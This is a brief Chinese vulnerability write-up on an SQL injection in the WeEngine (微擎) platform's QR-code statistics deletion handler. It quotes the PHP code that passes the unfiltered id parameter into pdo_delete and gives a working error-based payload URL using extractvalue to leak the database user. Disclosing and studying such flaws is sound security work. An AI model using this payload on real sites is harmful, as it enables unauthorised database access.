微擎普通用户权限SQL注入漏洞

  • A+
所属分类:漏洞时代
摘要

漏洞文件:web/source/platform/qr.ctrl.php代码行:204左右 $_GPC[‘id’]未过滤构造payload:

漏洞文件:web/source/platform/qr.ctrl.php

代码行:204左右

if($do == 'delsata') {     $id = $_GPC['id'];     $b = pdo_delete('qrcode_stat',array('id' =>$id, 'uniacid' => $_W['uniacid']));     if ($b){         message('删除成功',url('platform/qr/display'),'success');     }else{         message('删除失败',url('platform/qr/display'),'error');     } }

 

$_GPC['id']未过滤

构造payload:

http://localhost/we7/web/index.php ?c=platform &a=qr &do=delsata&id[0]=1/&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/user())))--+

 

demo测试

微擎普通用户权限SQL注入漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: